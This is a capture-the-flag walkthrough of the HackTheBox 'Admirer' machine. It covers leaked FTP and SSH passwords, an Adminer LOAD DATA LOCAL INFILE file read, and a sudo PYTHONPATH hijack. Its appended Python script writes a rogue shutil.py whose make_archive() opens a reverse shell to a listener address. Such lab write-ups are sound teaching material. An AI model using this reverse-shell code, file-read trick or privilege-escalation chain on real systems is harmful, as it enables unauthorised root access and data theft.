Admirer Writeup — HackTheBox
Made by RebornSec ®
Machine Maker(s) :
Overview :
- Finding credentials in the admin-dir/ directory
- Checking the files on FTP using the credentials we found
- Creating our own MySQL database and logging the Adminer administration panel into it
- Reading the web server's index.php through Adminer to get waldo's credentials and logging in as waldo
- We get user.txt
- Creating a rogue Python module called shutil.py with our own make_archive() function in it
- Launching admin_tasks.sh option 6 via sudo with PYTHONPATH pointing at that module
- We get root.txt
Enumeration phase :
As usual, let's start with an Nmap scan :
nmap -sC -sV 10.10.10.187
As we can see, the HTTP port is open. Let's check it in the browser :
It looks like a photo gallery website and there is no interesting link on the main page so far, so I ran DirBuster against it and found some important paths :
Let's see what they contain :
curl -XGET http://10.10.10.187/admin-dir/contacts.txt
curl -XGET http://10.10.10.187/admin-dir/credentials.txt
As expected! We got FTP credentials, let's use them :
ftpuser : %n?4Wz}R$tTF7
We get a couple of files: dump.sql and html.tar.gz, a compressed backup of the web root.
Let's look further into the files we got, starting with /utility-scripts/ :
admin_tasks.php, which we will come back to later :
db_admin.php, which gave me a clue about how to access the MySQL server :
Digging further, I found another path :
I tried to log in with every credential I had collected, but nothing worked, so I searched for a way to bypass it and landed on two articles demonstrating how Adminer versions below 4.7.0 can be abused: you log the Adminer instance into a MySQL or PostgreSQL database that you administer yourself, and from there make it read files off the web server :
So I set up my own database as described in the article :
I logged in with my own database "madcjdb" :
I went into my table "cjtable" :
Then I executed the statement from the article above :
LOAD DATA LOCAL INFILE '/app/data/local.xml' INTO TABLE cjtable FIELDS TERMINATED BY '\n'
but an error occurred :
LOAD DATA LOCAL means the file is read by the MySQL client, which here is the Adminer PHP process on the web server, and then sent to our database, so the path is resolved on the target, not on our machine. I therefore tried a path relative to the Adminer script instead, ../index.php :
LOAD DATA LOCAL INFILE '../index.php' INTO TABLE cjtable FIELDS TERMINATED BY '\n'
Then I ran a SELECT on cjtable :
And in the dumped index.php we got new credentials for waldo :
waldo:&<h5b~yK3F#{PaPB&dA}{H>
Now trying to SSH in with waldo's new credentials :
And we got our user.txt :D
Root phase :
For the root phase, I checked what waldo is allowed to run with sudo :
So waldo can run /opt/scripts/admin_tasks.sh as root, the script we mentioned earlier. Option 6 of that script runs /opt/scripts/backup.py, and reading backup.py shows that it imports make_archive from the shutil module. That is the way around the root restriction: we create our own module file called shutil.py (it has to be a .py file, since that is what Python's import machinery looks for) containing a make_archive() function that spawns a reverse shell, and we make Python find it before the standard library copy by pointing PYTHONPATH at our directory :
Then, with our nc listener running, we execute the command below. The -E flag and the PYTHONPATH= assignment only take effect because the sudo rule lets waldo pass his environment through for this command; if sudo stripped the environment, the real shutil would be imported and nothing would happen :
sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6
VOILA, WE GOT ROOT !
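To show why the PYTHONPATH trick works without touching the box, here is an added example of my own (it is not code from the writeup or from the machine's scripts). It writes the rogue shutil.py with a reverse-shell make_archive(), then asks a fresh interpreter which file a bare import shutil resolves to, once with PYTHONPATH pointing at that directory and once without. The listener address 10.10.14.2:4444 is an assumption; importing the rogue module never calls make_archive(), so the demo makes no network connection.

```python
import os
import subprocess
import sys
import tempfile
import textwrap
from typing import Optional, Tuple

# Assumed attacker listener (not from the writeup); match it to your `nc -lvnp`.
LHOST = "10.10.14.2"
LPORT = 4444


def write_hijack_module(directory: str, lhost: str = LHOST, lport: int = LPORT) -> str:
    """Write a rogue shutil.py into `directory` and return its real path.

    backup.py only does `from shutil import make_archive`, so the rogue module
    needs to provide just that one name.  Nothing runs at import time; the
    reverse shell starts only when root's backup.py calls make_archive().
    """
    source = textwrap.dedent(f"""\
        import os
        import socket
        import subprocess

        def make_archive(*args, **kwargs):
            # Called as root by /opt/scripts/backup.py (admin_tasks.sh option 6).
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(({lhost!r}, {lport}))
            for fd in (0, 1, 2):          # stdin/stdout/stderr -> the socket
                os.dup2(s.fileno(), fd)
            subprocess.call(["/bin/sh", "-i"])
        """)
    path = os.path.join(directory, "shutil.py")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(source)
    return os.path.realpath(path)


def resolve_shutil(pythonpath: Optional[str]) -> str:
    """Spawn a fresh interpreter and return the file `import shutil` came from.

    PYTHONPATH entries sit on sys.path *before* the standard library, which is
    the whole reason `sudo -E PYTHONPATH=$(pwd) ...` makes backup.py load ours.
    -S skips site.py so no .pth hook can pre-import shutil; PYTHONPATH is still
    honoured without site.
    """
    env = dict(os.environ)
    env.pop("PYTHONPATH", None)
    if pythonpath is not None:
        env["PYTHONPATH"] = pythonpath
    proc = subprocess.run(
        [sys.executable, "-S", "-c", "import shutil; print(shutil.__file__)"],
        env=env, capture_output=True, text=True, check=True,
    )
    return os.path.realpath(proc.stdout.strip())


def run_demo(lhost: str = LHOST, lport: int = LPORT) -> Tuple[str, str, str]:
    """Return (rogue_path, resolved_with_pythonpath, resolved_without_pythonpath)."""
    with tempfile.TemporaryDirectory() as workdir:
        rogue = write_hijack_module(workdir, lhost, lport)
        return rogue, resolve_shutil(workdir), resolve_shutil(None)


if __name__ == "__main__":
    rogue, hijacked, clean = run_demo()
    print("rogue module    :", rogue)
    print("with PYTHONPATH :", hijacked)   # the rogue module wins
    print("without         :", clean)      # the standard library copy
```

On the target the same file is dropped in waldo's working directory and the sudo command from the writeup does the rest; the demo only proves the import-order property that the attack depends on.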